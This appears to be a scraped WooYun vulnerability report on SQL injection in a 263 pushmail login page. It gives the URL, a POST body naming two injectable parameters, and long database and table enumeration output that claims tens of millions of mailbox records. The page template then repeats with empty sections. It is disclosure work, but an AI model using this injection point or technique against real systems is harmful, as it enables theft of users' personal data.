263通信某站sql注射千万数据 | wooyun-2014-059737| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059737

漏洞标题：263通信某站sql注射千万数据

漏洞作者：卡卡

提交时间：2014-05-07 10:31

修复时间：2014-06-21 10:32

公开时间：2014-06-21 10:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-07：细节已通知厂商并且等待厂商处理中
2014-05-07：厂商已经确认，细节仅向厂商公开
2014-05-17：细节向核心白帽子及相关领域专家公开
2014-05-27：细节向普通白帽子公开
2014-06-06：细节向实习白帽子公开
2014-06-21：细节向公众公开

简要描述：

有一次跟一女同事喝酒聚会，喝完女同事也醉了说想让我晚上陪她睡，我听完后一巴掌扇过去了，把她一人留在那，我想她肯定是想趁我睡着的时候偷我兜里的两百块钱，真没想到她是这种人，我呸！还好我机智！

详细说明：

问题站点：

http://pushmail.263.net/

注射链接：

http://pushmail.263.net/login_check.php

post内容：name=e&passwd=58e6b3a414a1e090dfc6029add0f3555ccba127f&region=&saveLogin=2
name和region皆存在post注射

数据库：

available databases [15]
[*] db263
[*] dbchinaunicom
[*] dblocal
[*] dboa
[*] dbpushmail
[*] dbstat
[*] dbtemp
[*] dbwap
[*] globaldata
[*] globalsetting
[*] information_schema
[*] mails
[*] mysql
[*] onlineinfo
[*] test

当前库：mails
表不跑不知道，一跑吓一跳
一共1584多个表
部分表

Database: mails
[1584 tables]
+----------------------------+
| blog_blacklist             |
| blog_friend                |
| blog_setting               |
| mails_attach               |
| mails_folder               |
| mails_history              |
| mails_index_2010_11        |
| mails_index_2010_12        |
| mails_index_2011_01        |
| mails_index_2011_02        |
| mails_index_2011_03        |
| mails_index_2011_04        |
| mails_index_2011_05        |
| mails_index_2011_06        |
| mails_index_2011_07        |
| mails_index_2011_08        |
| mails_index_2011_09        |
| mails_index_2011_10        |
| mails_index_2011_11        |
| mails_index_2011_12        |
| mails_list_0               |
| mails_list_1               |
| mails_list_10              |
| mails_list_100             |
| vcard_group_member_69      |
| vcard_group_member_7       |
| vcard_group_member_70      |
| vcard_group_member_71      |
| vcard_group_member_72      |
| vcard_group_member_73      |
| vcard_group_member_74      |
| vcard_group_member_75      |
| vcard_group_member_76      |
| vcard_group_member_77      |
| vcard_group_member_78      |
| vcard_group_member_79      |
| vcard_group_member_8       |
| vcard_group_member_80      |
| vcard_group_member_81      |
| vcard_group_member_82      |
| vcard_group_member_83      |
| vcard_group_member_84      |
| vcard_group_member_85      |
| vcard_group_member_86      |
| vcard_group_member_87      |
| vcard_group_member_88      |
| vcard_group_member_89      |
| vcard_group_member_9       |
| vcard_group_member_90      |
| vcard_group_member_91      |
| vcard_group_member_92      |
| vcard_group_member_93      |
| vcard_group_member_94      |
| vcard_group_member_95      |
| vcard_group_member_96      |
| vcard_group_member_97      |
| vcard_group_member_98      |
| vcard_group_member_99      |
| vcard_group_member_default |
| vcard_member_0             |
| vcard_member_1             |
| vcard_member_10            |
| vcard_member_100           |
| vcard_member_101           |
| vcard_member_102           |
| vcard_member_103           |
| vcard_member_104           |
| vcard_member_105           |
| vcard_member_106           |
| vcard_member_107           |
| vcard_member_108           |
| vcard_member_109           |
| vcard_member_11            |
| vcard_member_110           |
| vcard_member_111           |
| vcard_member_112           |
| vcard_member_113           |
| vcard_member_114           |
| vcard_member_115           |
| vcard_member_116           |
| vcard_member_117           |
| vcard_member_118           |
| vcard_member_119           |
| vcard_member_12            |
| vcard_member_120           |
| vcard_member_121           |
| vcard_member_122           |
| vcard_member_123           |
| vcard_member_124           |
| vcard_member_125           |
| vcard_member_126           |
| vcard_member_127           |
| vcard_member_128           |
| vcard_member_129           |
| vcard_member_13            |
| vcard_member_130           |
| vcard_member_131           |
| vcard_member_132           |
| vcard_member_133           |
| vcard_member_134           |
| vcard_member_135           |
| vcard_member_136           |
| vcard_member_137           |
| vcard_member_138           |
| vcard_member_139           |
| vcard_member_14            |
| vcard_member_140           |
| vcard_member_141           |
| vcard_member_142           |
| vcard_member_143           |
| vcard_member_144           |
| vcard_member_145           |
| vcard_member_146           |
| vcard_member_147           |
| vcard_member_148           |
| vcard_member_149           |
| vcard_member_15            |
| vcard_member_150           |
| vcard_member_151           |
| vcard_member_152           |
| vcard_member_153           |
| vcard_member_154           |
| vcard_member_155           |
| vcard_member_156           |
| vcard_member_157           |
| vcard_member_158           |
| vcard_member_159           |
| vcard_member_16            |
| vcard_member_160           |
| vcard_member_161           |
| vcard_member_162           |
| vcard_member_163           |
| vcard_member_164           |
| vcard_member_165           |
| vcard_member_166           |
| vcard_member_167           |
| vcard_member_168           |
| vcard_member_169           |
| vcard_member_17            |
| vcard_member_170           |
| vcard_member_171           |
| vcard_member_172           |
| vcard_member_173           |
| vcard_member_174           |
| vcard_member_175           |
| vcard_member_176           |
| vcard_member_177           |
| vcard_member_178           |
| vcard_member_179           |
| vcard_member_18            |
| vcard_member_180           |
| vcard_member_181           |
| vcard_member_182           |
| vcard_member_183           |
| vcard_member_184           |
| vcard_member_185           |
| vcard_member_186           |
| vcard_member_187           |
| vcard_member_188           |
| vcard_member_189           |
| vcard_member_19            |
| vcard_member_190           |
| vcard_member_191           |
| vcard_member_192           |
| vcard_member_193           |
| vcard_member_194           |
| vcard_member_195           |
| vcard_member_196           |
| vcard_member_197           |
| vcard_member_198           |
| vcard_member_199           |
| vcard_member_2             |
| vcard_member_20            |
| vcard_member_200           |
| vcard_member_201           |
| vcard_member_202           |
| vcard_member_203           |
| vcard_member_204           |
| vcard_member_205           |
| vcard_member_206           |
| vcard_member_207           |
| vcard_member_208           |
| vcard_member_209           |
| vcard_member_21            |
| vcard_member_210           |
| vcard_member_211           |
| vcard_member_212           |
| vcard_member_213           |
| vcard_member_214           |
| vcard_member_215           |
| vcard_member_216           |
| vcard_member_217           |
| vcard_member_218           |
| vcard_member_219           |
| vcard_member_22            |
| vcard_member_220           |
| vcard_member_221           |
| vcard_member_222           |
| vcard_member_223           |
| vcard_member_224           |
| vcard_member_225           |
| vcard_member_226           |
| vcard_member_227           |
| vcard_member_228           |
| vcard_member_229           |
| vcard_member_23            |
| vcard_member_230           |
| vcard_member_231           |
| vcard_member_232           |
| vcard_member_233           |
| vcard_member_234           |
| vcard_member_235           |
| vcard_member_236           |
| vcard_member_237           |
| vcard_member_238           |
| vcard_member_239           |
| vcard_member_24            |
| vcard_member_240           |
| vcard_member_241           |
| vcard_member_242           |
| vcard_member_243           |
| vcard_member_244           |
| vcard_member_245           |
| vcard_member_246           |
| vcard_member_247           |
| vcard_member_248           |
| vcard_member_249           |
| vcard_member_25            |
| vcard_member_250           |
| vcard_member_251           |
| vcard_member_252           |
| vcard_member_253           |
| vcard_member_254           |
| vcard_member_255           |
| vcard_member_26            |
| vcard_member_27            |
| vcard_member_28            |
| vcard_member_29            |
| vcard_member_3             |
| vcard_member_30            |
| vcard_member_31            |
| vcard_member_32            |
| vcard_member_33            |
| vcard_member_34            |
| vcard_member_35            |
| vcard_member_36            |
| vcard_member_37            |
| vcard_member_38            |
| vcard_member_39            |
| vcard_member_4             |
| vcard_member_40            |
| vcard_member_41            |
| vcard_member_42            |
| vcard_member_43            |
| vcard_member_44            |
| vcard_member_45            |
| vcard_member_46            |
| vcard_member_47            |
| vcard_member_48            |
| vcard_member_49            |
| vcard_member_5             |
| vcard_member_50            |
| vcard_member_51            |
| vcard_member_52            |
| vcard_member_53            |
| vcard_member_54            |
| vcard_member_55            |
| vcard_member_56            |
| vcard_member_57            |
| vcard_member_58            |
| vcard_member_59            |
| vcard_member_6             |
| vcard_member_60            |
| vcard_member_61            |
| vcard_member_62            |
| vcard_member_63            |
| vcard_member_64            |
| vcard_member_65            |
| vcard_member_66            |
| vcard_member_67            |
| vcard_member_68            |
| vcard_member_69            |
| vcard_member_7             |
| vcard_member_70            |
| vcard_member_71            |
| vcard_member_72            |
| vcard_member_73            |
| vcard_member_74            |
| vcard_member_75            |
| vcard_member_76            |
| vcard_member_77            |
| vcard_member_78            |
| vcard_member_79            |
| vcard_member_8             |
| vcard_member_80            |
| vcard_member_81            |
| vcard_member_82            |
| vcard_member_83            |
| vcard_member_84            |
| vcard_member_85            |
| vcard_member_86            |
| vcard_member_87            |
| vcard_member_88            |
| vcard_member_89            |
| vcard_member_9             |
| vcard_member_90            |
| vcard_member_91            |
| vcard_member_92            |
| vcard_member_93            |
| vcard_member_94            |
| vcard_member_95            |
| vcard_member_96            |
| vcard_member_97            |
| vcard_member_98            |
| vcard_member_99            |
+----------------------------+

注意看格式都是很规律的
vcard_member这个表的数量是1~250多
我随机抽取10个跑了一下，每个表都5W左右数据
200多表最少上千万的数据
各种邮箱信息都有

其他的表都没看，赶快修复吧，这种大型的mail，
绝对没扒裤子

漏洞证明：

数据库：

available databases [15]
[*] db263
[*] dbchinaunicom
[*] dblocal
[*] dboa
[*] dbpushmail
[*] dbstat
[*] dbtemp
[*] dbwap
[*] globaldata
[*] globalsetting
[*] information_schema
[*] mails
[*] mysql
[*] onlineinfo
[*] test

当前库：mails
部分表

Database: mails
[1584 tables]
+----------------------------+
| blog_blacklist             |
| blog_friend                |
| blog_setting               |
| mails_attach               |
| mails_folder               |
| mails_history              |
| mails_index_2010_11        |
| mails_index_2010_12        |
| mails_index_2011_01        |
| mails_index_2011_02        |
| mails_index_2011_03        |
| mails_index_2011_04        |
| mails_index_2011_05        |
| mails_index_2011_06        |
| mails_index_2011_07        |
| mails_index_2011_08        |
| mails_index_2011_09        |
| mails_index_2011_10        |
| mails_index_2011_11        |
| mails_index_2011_12        |
| mails_list_0               |
| mails_list_1               |
| mails_list_10              |
| mails_list_100             |
| vcard_group_member_69      |
| vcard_group_member_7       |
| vcard_group_member_70      |
| vcard_group_member_71      |
| vcard_group_member_72      |
| vcard_group_member_73      |
| vcard_group_member_74      |
| vcard_group_member_75      |
| vcard_group_member_76      |
| vcard_group_member_77      |
| vcard_group_member_78      |
| vcard_group_member_79      |
| vcard_group_member_8       |
| vcard_group_member_80      |
| vcard_group_member_81      |
| vcard_group_member_82      |
| vcard_group_member_83      |
| vcard_group_member_84      |
| vcard_group_member_85      |
| vcard_group_member_86      |
| vcard_group_member_87      |
| vcard_group_member_88      |
| vcard_group_member_89      |
| vcard_group_member_9       |
| vcard_group_member_90      |
| vcard_group_member_91      |
| vcard_group_member_92      |
| vcard_group_member_93      |
| vcard_group_member_94      |
| vcard_group_member_95      |
| vcard_group_member_96      |
| vcard_group_member_97      |
| vcard_group_member_98      |
| vcard_group_member_99      |
| vcard_group_member_default |
| vcard_member_0             |
| vcard_member_1             |
| vcard_member_10            |
| vcard_member_100           |
| vcard_member_101           |
| vcard_member_102           |
| vcard_member_103           |
| vcard_member_104           |
| vcard_member_105           |
| vcard_member_106           |
| vcard_member_107           |
| vcard_member_108           |
| vcard_member_109           |
| vcard_member_11            |
| vcard_member_110           |
| vcard_member_111           |
| vcard_member_112           |
| vcard_member_113           |
| vcard_member_114           |
| vcard_member_115           |
| vcard_member_116           |
| vcard_member_117           |
| vcard_member_118           |
| vcard_member_119           |
| vcard_member_12            |
| vcard_member_120           |
| vcard_member_121           |
| vcard_member_122           |
| vcard_member_123           |
| vcard_member_124           |
| vcard_member_125           |
| vcard_member_126           |
| vcard_member_127           |
| vcard_member_128           |
| vcard_member_129           |
| vcard_member_13            |
| vcard_member_130           |
| vcard_member_131           |
| vcard_member_132           |
| vcard_member_133           |
| vcard_member_134           |
| vcard_member_135           |
| vcard_member_136           |
| vcard_member_137           |
| vcard_member_138           |
| vcard_member_139           |
| vcard_member_14            |
| vcard_member_140           |
| vcard_member_141           |
| vcard_member_142           |
| vcard_member_143           |
| vcard_member_144           |
| vcard_member_145           |
| vcard_member_146           |
| vcard_member_147           |
| vcard_member_148           |
| vcard_member_149           |
| vcard_member_15            |
| vcard_member_150           |
| vcard_member_151           |
| vcard_member_152           |
| vcard_member_153           |
| vcard_member_154           |
| vcard_member_155           |
| vcard_member_156           |
| vcard_member_157           |
| vcard_member_158           |
| vcard_member_159           |
| vcard_member_16            |
| vcard_member_160           |
| vcard_member_161           |
| vcard_member_162           |
| vcard_member_163           |
| vcard_member_164           |
| vcard_member_165           |
| vcard_member_166           |
| vcard_member_167           |
| vcard_member_168           |
| vcard_member_169           |
| vcard_member_17            |
| vcard_member_170           |
| vcard_member_171           |
| vcard_member_172           |
| vcard_member_173           |
| vcard_member_174           |
| vcard_member_175           |
| vcard_member_176           |
| vcard_member_177           |
| vcard_member_178           |
| vcard_member_179           |
| vcard_member_18            |
| vcard_member_180           |
| vcard_member_181           |
| vcard_member_182           |
| vcard_member_183           |
| vcard_member_184           |
| vcard_member_185           |
| vcard_member_186           |
| vcard_member_187           |
| vcard_member_188           |
| vcard_member_189           |
| vcard_member_19            |
| vcard_member_190           |
| vcard_member_191           |
| vcard_member_192           |
| vcard_member_193           |
| vcard_member_194           |
| vcard_member_195           |
| vcard_member_196           |
| vcard_member_197           |
| vcard_member_198           |
| vcard_member_199           |
| vcard_member_2             |
| vcard_member_20            |
| vcard_member_200           |
| vcard_member_201           |
| vcard_member_202           |
| vcard_member_203           |
| vcard_member_204           |
| vcard_member_205           |
| vcard_member_206           |
| vcard_member_207           |
| vcard_member_208           |
| vcard_member_209           |
| vcard_member_21            |
| vcard_member_210           |
| vcard_member_211           |
| vcard_member_212           |
| vcard_member_213           |
| vcard_member_214           |
| vcard_member_215           |
| vcard_member_216           |
| vcard_member_217           |
| vcard_member_218           |
| vcard_member_219           |
| vcard_member_22            |
| vcard_member_220           |
| vcard_member_221           |
| vcard_member_222           |
| vcard_member_223           |
| vcard_member_224           |
| vcard_member_225           |
| vcard_member_226           |
| vcard_member_227           |
| vcard_member_228           |
| vcard_member_229           |
| vcard_member_23            |
| vcard_member_230           |
| vcard_member_231           |
| vcard_member_232           |
| vcard_member_233           |
| vcard_member_234           |
| vcard_member_235           |
| vcard_member_236           |
| vcard_member_237           |
| vcard_member_238           |
| vcard_member_239           |
| vcard_member_24            |
| vcard_member_240           |
| vcard_member_241           |
| vcard_member_242           |
| vcard_member_243           |
| vcard_member_244           |
| vcard_member_245           |
| vcard_member_246           |
| vcard_member_247           |
| vcard_member_248           |
| vcard_member_249           |
| vcard_member_25            |
| vcard_member_250           |
| vcard_member_251           |
| vcard_member_252           |
| vcard_member_253           |
| vcard_member_254           |
| vcard_member_255           |
| vcard_member_26            |
| vcard_member_27            |
| vcard_member_28            |
| vcard_member_29            |
| vcard_member_3             |
| vcard_member_30            |
| vcard_member_31            |
| vcard_member_32            |
| vcard_member_33            |
| vcard_member_34            |
| vcard_member_35            |
| vcard_member_36            |
| vcard_member_37            |
| vcard_member_38            |
| vcard_member_39            |
| vcard_member_4             |
| vcard_member_40            |
| vcard_member_41            |
| vcard_member_42            |
| vcard_member_43            |
| vcard_member_44            |
| vcard_member_45            |
| vcard_member_46            |
| vcard_member_47            |
| vcard_member_48            |
| vcard_member_49            |
| vcard_member_5             |
| vcard_member_50            |
| vcard_member_51            |
| vcard_member_52            |
| vcard_member_53            |
| vcard_member_54            |
| vcard_member_55            |
| vcard_member_56            |
| vcard_member_57            |
| vcard_member_58            |
| vcard_member_59            |
| vcard_member_6             |
| vcard_member_60            |
| vcard_member_61            |
| vcard_member_62            |
| vcard_member_63            |
| vcard_member_64            |
| vcard_member_65            |
| vcard_member_66            |
| vcard_member_67            |
| vcard_member_68            |
| vcard_member_69            |
| vcard_member_7             |
| vcard_member_70            |
| vcard_member_71            |
| vcard_member_72            |
| vcard_member_73            |
| vcard_member_74            |
| vcard_member_75            |
| vcard_member_76            |
| vcard_member_77            |
| vcard_member_78            |
| vcard_member_79            |
| vcard_member_8             |
| vcard_member_80            |
| vcard_member_81            |
| vcard_member_82            |
| vcard_member_83            |
| vcard_member_84            |
| vcard_member_85            |
| vcard_member_86            |
| vcard_member_87            |
| vcard_member_88            |
| vcard_member_89            |
| vcard_member_9             |
| vcard_member_90            |
| vcard_member_91            |
| vcard_member_92            |
| vcard_member_93            |
| vcard_member_94            |
| vcard_member_95            |
| vcard_member_96            |
| vcard_member_97            |
| vcard_member_98            |
| vcard_member_99            |
+----------------------------+

注意看格式都是很规律的
vcard_member这个表的数量是1~250多
我随机抽取10个跑了一下，每个表都5W左右数据
200多表最少上千万的数据
各种邮箱信息都有

修复方案：

你们懂的~~

版权声明：转载请注明来源卡卡@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：1

确认时间：2014-05-07 11:02

厂商回复：

已经不是263业务，请通知和信
. IN CNAME .
. 1561 IN CNAME .
. 1561 IN A 211.151.62.46

漏洞评价：

2014-05-07 11:00 | Moc ( 路人 | Rank:23 漏洞数:12 | 屌丝何苦为难屌丝)

我开始害怕撸主的基智了

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059737

漏洞标题：263通信某站sql注射千万数据

相关厂商：263通信

漏洞作者：卡卡

提交时间：2014-05-07 10:31

修复时间：2014-06-21 10:32

公开时间：2014-06-21 10:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源卡卡@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059737

漏洞标题：263通信某站sql注射千万数据

相关厂商：263通信

漏洞作者： 卡卡

提交时间：2014-05-07 10:31

修复时间：2014-06-21 10:32

公开时间：2014-06-21 10:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-059737"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 卡卡@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：卡卡

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源卡卡@乌云